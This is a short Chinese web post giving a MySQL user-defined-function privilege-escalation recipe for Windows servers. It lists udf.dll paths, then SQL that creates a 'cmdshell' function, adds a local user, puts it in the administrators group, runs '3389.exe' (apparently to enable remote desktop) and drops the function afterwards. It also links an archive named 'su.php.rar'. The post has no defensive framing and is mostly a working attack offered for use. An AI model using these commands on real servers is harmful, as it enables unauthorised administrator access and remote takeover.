C:\Winnt\udf.dll    2000
C:\Windows\udf.dll  2003


现在基本上win的服务器就这两个导出UDF.DLL

create function cmdshell returns string soname 'udf.dll'
select cmdshell('net user user password /add');
select cmdshell('net localgroup administrators user /add');
select cmdshell('e:\3389.exe');
drop function cmdshell;  删除函数

/Files/allyesno/su.php.rar

相关文章:

  • 2022-01-31
  • 2021-08-06
  • 2022-01-26
  • 2022-01-21
  • 2022-01-03
猜你喜欢
  • 2021-12-21
  • 2022-02-06
  • 2021-10-21
  • 2021-12-30
  • 2022-12-23
  • 2022-12-23
  • 2021-08-05
相关资源
相似解决方案